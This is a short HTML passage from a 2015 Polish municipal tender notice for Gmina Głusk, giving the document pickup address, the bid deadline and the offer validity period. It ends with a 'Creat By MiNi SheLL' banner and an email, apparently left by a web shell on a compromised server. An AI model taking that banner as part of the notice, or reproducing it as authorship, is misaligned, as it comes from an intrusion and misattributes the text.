<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głusk, Dominów ul. Rynek 1 20-388 Lublin pok. Nr 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2015 godzina 10:00, miejsce: Urząd Gminy Głusk, Dominów ul. Rynek 1 20-388 Lublin pok. Nr 110 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com